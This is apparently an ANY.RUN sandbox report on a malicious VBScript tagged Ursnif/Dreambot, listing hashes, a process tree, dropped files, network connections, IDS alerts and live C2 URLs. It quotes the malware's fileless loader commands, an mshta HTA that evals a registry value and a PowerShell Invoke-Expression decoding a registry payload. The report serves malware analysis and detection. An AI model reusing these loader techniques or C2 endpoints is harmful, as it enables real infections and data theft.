analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

file.vbs

Full analysis: https://app.any.run/tasks/d86d713b-3a8f-4f8e-bc49-fc98cceda25d
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: September 19, 2019, 06:16:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gozi
ursnif
dreambot
evasion
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

54FE2BB31C7E40D2778DCCEAF1771BBF

SHA1:

6A9190086174ECC42607FBC7689DD6193864D59E

SHA256:

6B1099C73D33285C8CD6313FA0342E6A40F3890709D305E4522E3A406123A1B4

SSDEEP:

24576:wJoLWXjGxPNfyt+gUhW5X18ccI7cI/MPsW+ovxg09jE8Vdf9:wuLWXjust+gUhW5X18cx7hMd1xHjE8V/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • zydnzZz.exe (PID: 2172)
    • URSNIF was detected

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
    • Connects to CnC server

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2744)
    • Starts Visual C# compiler

      • powershell.exe (PID: 3044)
    • Runs injected code in another process

      • powershell.exe (PID: 3044)
    • Application was injected by another process

      • explorer.exe (PID: 276)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3240)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 276)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3304)
    • Executed via WMI

      • zydnzZz.exe (PID: 2172)
    • Executed via COM

      • iexplore.exe (PID: 2680)
      • iexplore.exe (PID: 3568)
      • iexplore.exe (PID: 3200)
    • Executes scripts

      • explorer.exe (PID: 276)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 276)
    • Creates files in the user directory

      • powershell.exe (PID: 3044)
    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 276)
    • Checks for external IP

      • nslookup.exe (PID: 3832)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 276)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 276)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2680)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3136)
      • iexplore.exe (PID: 3924)
    • Changes internet zones settings

      • iexplore.exe (PID: 3568)
      • iexplore.exe (PID: 2680)
      • iexplore.exe (PID: 3200)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3320)
      • iexplore.exe (PID: 3924)
      • iexplore.exe (PID: 3136)
      • mshta.exe (PID: 2744)
    • Manual execution by user

      • mshta.exe (PID: 2744)
      • cmd.exe (PID: 3240)
    • Reads settings of System Certificates

      • explorer.exe (PID: 276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
21
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject wscript.exe zydnzzz.exe no specs iexplore.exe #URSNIF iexplore.exe iexplore.exe no specs #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe mshta.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs ping.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs makecab.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3304"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\file.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2172C:\Users\admin\AppData\Local\Temp\zydnzZz.exeC:\Users\admin\AppData\Local\Temp\zydnzZz.exewmiprvse.exe
User:
admin
Company:
Duckcircle BigMachines
Integrity Level:
MEDIUM
Description:
ShouldCreate
Exit code:
0
Version:
15.5.66.67
2680"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3320"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2680 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3568"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3924"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3568 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3200"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3136"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3200 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2744"C:\Windows\System32\mshta.exe" "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Devivmgr'));if(!window.flag)close()</script>"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3044"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty "HKCU:Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB").crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 839
Read events
1 602
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
9
Text files
17
Unknown types
4

Dropped files

PID
Process
Filename
Type
3304WScript.exeC:\Users\admin\AppData\Local\Temp\cIbHOuU.txt
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF109C6CED47E35B01.TMP
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{20C5A5DA-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF850A1E11CB0852AA.TMP
MD5:
SHA256:
2680iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{20C5A5D9-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFD857C97DBA4719DE.TMP
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{2DD90B72-DAA5-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
15
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3320
iexplore.exe
GET
404
172.217.18.174:80
http://google.com/images/gp0NPEGPJh/IMBJ24uTCR_2Fs2qn/_2B0xZoGd1L7/J_2FmW5WueD/4_2F3_2F6H3BAA/qT_2BfrjkNCNkCF3U9rcW/WdlJp5frkxOhfjbI/8d_2FnJX0R6g8dI/L9LG7daBXt78A8iu2n/UQeBwY6QW/GnCVNyGm_2/FonN3N7gU/9WUk.avi
US
html
1.71 Kb
whitelisted
3924
iexplore.exe
GET
404
172.217.22.5:80
http://gmail.com/images/LCY39Z5cFqau4/1o_2Fw75/lYjWXRBQpq4Br4tO2800yU3/IZ_2FlEWND/Tb7WqVGDVdl5Frb2T/SXhS2C0_2FI_/2BODsiKCfeJ/uuV55bQhYtw5kR/hgjZGTlueE9FzL6lk5DKP/tEWlqRBSdyy0MZ4Q/C5uFPk2aXPgc/3.avi
US
html
1.70 Kb
shared
3136
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/M4DUflZqJmnyEO8I/mpqveVYGikzOYaX/dgQ_2BULa9_2Fl80SK/D8nw0Rnmp/0ppjFYHbiSUOvqDPKYYO/Gv8lwl3XkL_2FpOgPt2/DvrsGoCByUeJGijXwmLYM1/bfOYPbeAPunu3/tOwYQGbV/nuJkmoZ9B/_2FLX3qv/n.avi
DE
text
213 Kb
malicious
3136
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/Jq5Fx_2FOk_2BRYky27pg/gKKIwPu2wLlvkzWj/qWkcffxs8E6MG6O/h249rCj4kavVEhn2KX/ZSVcHMEaD/_2FV96VBGfL0eGD3xb_2/FOaFHpqavI_2BYS8NAX/DDU9CqbxyMVf4NCPe9a4EL/6XFk5hEziyCvPqzHcj_2B/3.avi
DE
text
2.32 Kb
malicious
2680
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3320
iexplore.exe
GET
200
172.217.16.132:80
http://www.google.com/images/errors/robot.png
US
image
6.18 Kb
whitelisted
276
explorer.exe
GET
200
95.101.72.115:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
57.0 Kb
whitelisted
3320
iexplore.exe
GET
200
172.217.16.132:80
http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
US
image
3.10 Kb
whitelisted
3200
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/favicon.ico
DE
image
5.30 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2680
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3320
iexplore.exe
172.217.16.132:80
www.google.com
Google Inc.
US
whitelisted
3200
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious
3924
iexplore.exe
172.217.22.5:80
gmail.com
Google Inc.
US
whitelisted
3320
iexplore.exe
172.217.18.174:80
google.com
Google Inc.
US
whitelisted
3136
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious
276
explorer.exe
172.217.18.174:443
google.com
Google Inc.
US
whitelisted
276
explorer.exe
172.217.22.5:443
gmail.com
Google Inc.
US
whitelisted
3832
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
192.119.111.106:443
Hostwinds LLC.
US
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
google.com
  • 172.217.18.174
whitelisted
www.google.com
  • 172.217.16.132
whitelisted
gmail.com
  • 172.217.22.5
shared
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 89.187.165.52
shared
www.download.windowsupdate.com
  • 95.101.72.115
  • 95.101.72.131
whitelisted

Threats

PID
Process
Class
Message
3320
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3924
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
3136
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3832
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
9 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144